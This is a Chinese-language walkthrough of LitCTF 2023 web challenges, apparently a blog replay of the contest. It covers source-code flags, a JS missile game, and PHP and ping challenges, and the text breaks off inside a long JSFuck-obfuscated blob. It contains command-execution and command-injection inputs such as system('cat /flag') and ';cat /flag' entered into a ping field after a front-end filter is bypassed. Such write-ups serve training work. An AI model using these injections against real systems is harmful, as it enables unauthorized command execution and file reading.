【2023】LitCTF

LitCTF2023(复现)

Web:

1、我Flag呢?

​ ctrl+u 读取源码,在最后发现了flag:

<!--flag is here flag=NSSCTF{3d5218b9-4e24-4d61-9c15-68f8789e8c48} -->

2、PHP是世界上最好的语言!!


​ 右边那个框下面是 RUN CODE ,结合题目是PHP,推测为RCE,先输入echo 123;看看会发生啥:发现左边输出内容出现了123,说明输入被当作PHP代码执行了,那么,直接system("cat /flag");成功拿到flag:flag=NSSCTF{b26d3851-52f5-4a80-9e69-6417baf49d68}

3、导弹迷踪

​ js游戏题,先看源码,这里看game.js:

/**
 * MG.game: level / lives state machine of the missile game.
 *
 * Built as an immediately-invoked function: all state (mState, mLives,
 * mLevel, ...) lives in closure variables and only the object returned at the
 * bottom is reachable from outside. Relies on MG.banner, MG.missile,
 * MG.barrierQueue, MG.tunnelWall, MG.fog, MG.util, MG.BarrierType and
 * NAMESPACE_SVG, none of which are defined in this listing.
 */
MG.game = (function () {

    /** Constants **/
    var GameState = {
        WAIT_START: 'wait_start',
        STARTING:   'starting',
        RUNNING:    'running',
        FINISHED:   'finished',
        CRASHED:    'crashed'
    }

    var STARTING_LIVES = 5;

    var LEVEL_NUM_BARRIERS = 20;

    /** Variables **/
    var mState = GameState.WAIT_START;

    var mLives = STARTING_LIVES;
    var mLevel = 0;

    var mRemainingBarriers = 0;
    var mBarriersToPass = 0;

    var mProgress = 0.0;
    var mBestProgress = 0.0;

    /* Strings for UI ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
    var getLevelString = function () {
        return mLevel ? 'LEVEL ' + mLevel : 'QUALIFYING LEVEL';
    }

    // Banner title/text pairs; every entry is a function so the text is
    // computed at the moment the banner is shown.
    var Messages = {
        START: {
            title: getLevelString,
            text:  function () {return 'CLICK TO BEGIN';}
        },
        CRASH: {
            title: function () {return 'CRASHED';},
            text:  function () {return 'CLICK TO RETRY';}
        },
        GAME_OVER: {
            title: function () {return 'GAME OVER';},
            text:  function () {return 'CLICK TO START AGAIN';}
        },
        FINISH: {
            title: function () {return 'LEVEL COMPLETED';},
            // NOTE(review): the level-6 reward text is a plain string literal
            // in a script that is delivered to the browser, so it can be read
            // from the page source without playing the game. A value that must
            // stay secret until a condition is met has to be checked and
            // issued by the server, not embedded in client-side code.
            text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},
        }
    };

    // Missile velocities; each grows by 100 per level.
    var getLevelStartVelocity   = function (level) {
        return 300 + 100*level;
    }
    var getLevelFinishVelocity  = function (level) {
        return 400 + 100*level;
    }
    var getPreLevelIdleVelocity = function (level) {
        return 350 + 100*level;
    }
    var getPostLevelIdleVelocity = function (level) {
        return 550 + 100*level;
    }

    // Shows the 'explosion' element, starts its animation and hides it again
    // after 400 ms.
    var playCrashAnimation = function () {
        // TODO move drawing out of the update loop

        // create a copy of the explosion element
        var explosion = document.getElementById('explosion');

        // play the animation
        explosion.firstChild.beginElement();
        explosion.setAttribute('visibility', 'visible');

        // TODO can't seem to get a callback to fire when the animation
        // finishes. Use timeout instead
        setTimeout(function (){
            var explosion = document.getElementById('explosion');
            explosion.setAttribute('visibility', 'hidden');
        }, 400);
    }

    // Transition to WAIT_START: show the start banner and idle on autopilot.
    var goWaitStartLevel = function () {
        MG.banner.show(Messages.START.title(), Messages.START.text());
        MG.util.showMouse();

        MG.missile.setAutopilot();
        MG.missile.setVelocity(getPreLevelIdleVelocity(mLevel));

        // Level 0 is the qualifying level: lives are unlimited there.
        if (mLevel === 0) {mLives = Infinity;}

        mState = GameState.WAIT_START;
    }

    // Transition to STARTING: hide the banner, queue the START barrier and
    // hand control of the missile to the player.
    var goRun = function () {
        MG.banner.hide();
        MG.util.hideMouse();

        /* TODO should the start barrier be pushed here?
        If so, should all of the barriers for the entire level be pushed as well? */
        mRemainingBarriers = LEVEL_NUM_BARRIERS;
        MG.barrierQueue.pushBarrier(MG.BarrierType.START);

        mBarriersToPass = LEVEL_NUM_BARRIERS;

        MG.missile.setManual();

        mState = GameState.STARTING;
    }

    // Transition to FINISHED: show the FINISH banner (whose text depends on
    // mLevel) and idle on autopilot.
    var goFinish = function () {
        MG.banner.show(Messages.FINISH.title(), Messages.FINISH.text());
        MG.util.showMouse();

        MG.missile.setAutopilot();
        MG.missile.setVelocity(getPostLevelIdleVelocity(mLevel));

        mState = GameState.FINISHED;
    }

    // Transition to CRASHED: GAME_OVER banner when no lives are left,
    // CRASH banner otherwise.
    var goCrash = function () {
        MG.util.showMouse();

        if (mLives === 0) {
            MG.banner.show(Messages.GAME_OVER.title(), Messages.GAME_OVER.text());
        } else {
            MG.banner.show(Messages.CRASH.title(), Messages.CRASH.text());
        }

        playCrashAnimation()

        mState = GameState.CRASHED;
    }

    //==========================================================================

    return {
        // Builds the SVG groups for the tunnel wall and the barrier queue
        // under the 'tunnel' element, then enters WAIT_START.
        init: function () {
            var rootNode = document.getElementById('tunnel');

            MG.missile.init();

            //
            var wallNode;
            wallNode = document.createElementNS(NAMESPACE_SVG, 'g');
            wallNode.setAttribute('transform', 'scale(1,-1)');

            MG.tunnelWall.init(wallNode);

            rootNode.appendChild(wallNode);

            //
            var barrierQueueNode;
            barrierQueueNode = document.createElementNS(NAMESPACE_SVG, 'g');
            barrierQueueNode.setAttribute('transform', 'scale(1,-1)');

            MG.barrierQueue.init(barrierQueueNode);

            rootNode.appendChild(barrierQueueNode);

            //
            goWaitStartLevel();

            rootNode.setAttribute('visibility', 'visible');
        },

        // Advances the simulation by dt: collision / barrier-passed handling,
        // barrier queue padding and progress bookkeeping.
        update: function (dt) {
            MG.missile.update(dt);
            MG.tunnelWall.update(dt);
            MG.barrierQueue.update(dt);

            /* check whether the nearest barrier has been reached and whether the missile collides with it. */
            if (!MG.barrierQueue.isEmpty()) {
                if (MG.missile.getOffset() < MG.MISSILE_LENGTH && !MG.missile.isCrashed()){
                    var barrier = MG.barrierQueue.nextBarrier();

                    if (barrier.collides(MG.missile.getPosition().x, MG.missile.getPosition().y)) {
                        // CRASH
                        MG.missile.onCrash();
                        goCrash();
                    } else {

                        // BARRIER PASSED
                        MG.barrierQueue.popBarrier();
                        MG.missile.onBarrierPassed();

                        // TODO this block makes loads of assumptions about state
                        if (mState === GameState.RUNNING
                         || mState === GameState.STARTING) {
                            switch(barrier.getType()) {
                              case MG.BarrierType.FINISH:
                                goFinish();
                                break;
                              case MG.BarrierType.BLANK:
                                break;
                              case MG.BarrierType.START:
                                mState = GameState.RUNNING;
                                // FALLTHROUGH
                              default:
                                mBarriersToPass--;

                                var startVelocity = getLevelStartVelocity(mLevel);
                                var finishVelocity = getLevelFinishVelocity(mLevel);

                                // Linear ramp: startVelocity while
                                // mBarriersToPass equals LEVEL_NUM_BARRIERS,
                                // finishVelocity once it reaches 0.
                                MG.missile.setVelocity(startVelocity
                                                     + (startVelocity - finishVelocity)
                                                     * (mBarriersToPass - LEVEL_NUM_BARRIERS)
                                                     / LEVEL_NUM_BARRIERS);
                                break;
                            }
                        }
                    }
                }
            }

            /* Pad the barrier queue with blank barriers so that there are barriers
            as far as can be seen. */
            while (MG.barrierQueue.numBarriers() < MG.LINE_OF_SIGHT/MG.BARRIER_SPACING) {
                var type = MG.BarrierType.BLANK;

                // During a level: RANDOM barriers while the countdown is
                // positive, one FINISH barrier when it hits 0, BLANK after.
                if (mState === GameState.RUNNING
                 || mState === GameState.STARTING) {
                    mRemainingBarriers--;
                    if (mRemainingBarriers > 0) {
                        type = MG.BarrierType.RANDOM;
                    } else if (mRemainingBarriers === 0) {
                        type = MG.BarrierType.FINISH;
                    } else {
                        type = MG.BarrierType.BLANK;
                    }
                }

                MG.barrierQueue.pushBarrier(type);
            }

            /* Update progress */
            switch (mState) {
              case GameState.RUNNING:
                mProgress = 1 - (mBarriersToPass*MG.BARRIER_SPACING + MG.missile.getOffset())/(LEVEL_NUM_BARRIERS * MG.BARRIER_SPACING);
                mBestProgress = Math.max(mProgress, mBestProgress);
                break;
              case GameState.FINISHED:
                mProgress = 1;
                mBestProgress = 1;
                break;
              case GameState.STARTING:
                mProgress = 0;
                break;
              default:
                break;
            }

        },

        // Pushes the missile position and offset to the barrier and wall views.
        updateDOM: function () {
            var position = MG.missile.getPosition();
            var offset = MG.missile.getOffset();

            MG.barrierQueue.updateDOM(-position.x, -position.y, offset);
            MG.tunnelWall.updateDOM(-position.x, -position.y, offset);
        },

        // Converts window coordinates to a target relative to the window
        // centre, with the y axis flipped.
        onMouseMove: function (x, y) {
            var windowWidth = window.innerWidth;
            var windowHeight = window.innerHeight;

            MG.missile.setTarget(x - 0.5*windowWidth, -(y - 0.5*windowHeight));

        },

        // Clicks are only honoured while the banner is fully visible; what a
        // click does depends on the current state.
        onMouseClick: function () {
            if (MG.banner.isFullyVisible()) {
                switch (mState) {
                  case GameState.WAIT_START:
                    goRun();
                    break;
                  case GameState.FINISHED:
                    /* The player is given an infinite number of lives
                    during the qualifying level but these should be
                    removed before continuing. */
                    if (mLevel === 0) {mLives = STARTING_LIVES;}

                    mLevel++;

                    mBestProgress = 0.0;

                    goWaitStartLevel();
                    break;
                  case GameState.CRASHED:
                    MG.banner.hide();
                    MG.fog.fadeIn(function() {
                        // Out of lives: restart from the qualifying level.
                        if (mLives === 0) {
                            mLevel = 0;
                            mLives = STARTING_LIVES;
                            mBestProgress = 0.0;
                        } else {
                            mLives--;
                        }

                        MG.missile.reset();
                        MG.barrierQueue.reset();

                        MG.fog.fadeOut();
                        goWaitStartLevel();
                    });
                    break;
                }
            }
        },

        /* Returns an integer representing the current level */
        getLevel: function () {
            return mLevel;
        },

        /* Returns a human readable string describing the current level */
        getLevelString: getLevelString,

        /* Returns the number of times the player can crash before game over. */
        /* If the player crashes with zero lives remaining the game ends */
        getNumLives: function () {
            return mLives;
        },

        /* Returns the progress through the level as a value between 0 and 1,
        where 0 is not yet started and 1 is completed. */
        getProgress: function () {
            return mProgress;
        },

        /* Returns the highest progress value recorded by update() since it was last reset to 0 */
        getBestProgress: function () {
            return mBestProgress;
        }
    };
}());

​ 然后发现重要代码:

text:  function () {if (mLevel === 6) {return 'GOT F|L|A|G {y0u_w1n_th1s_!!!}';} else {return 'CLICK TO CONTINUE';}},

​ 成功获得flag:{y0u_w1n_th1s_!!!}

4、Follow me and hack me

​ 直接hackbar传参GET:?CTF=Lit2023 POST:Challenge=i'm_c0m1ng

5、Ping:

​ 尝试ping一下127.0.0.1能通,之后尝试 ;ls 发现不行,被限制了,不过,查看网页源代码发现是前端过滤,禁用js之后就能过了,无脑 ;cat /flag拿到flag: flag=NSSCTF{1a6530af-202d-463c-b4ea-c0447db5b801}

6、1zjs:

​ 这个1z真的1点也不Ez (>_<)

​ 第一件事儿查看源码,发现文件./dist/index.umd.js

​ 在这个文件的注释中找到了一个文件:f@k3f1ag.php

​ 之后访问这个文件:

(+[![]]+[])[+[]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+[]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![
]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()(([]+[])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]())[!+[]+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]
]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+
[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]])()([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]]((+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+!+[]])+(![]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]])()())[!+[]+!+[]+!+[]+[+[]]]+(+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]
+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]+[+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+(![]+[])[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[]+[+[]]+[]+[!+[]+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[+!+[]]+[]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(+((+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+[+[]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+[]]+[+!+[]]])+[])[!+[]+!+[]]+[+[]]+[]+[+!+[]]+[]+([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(
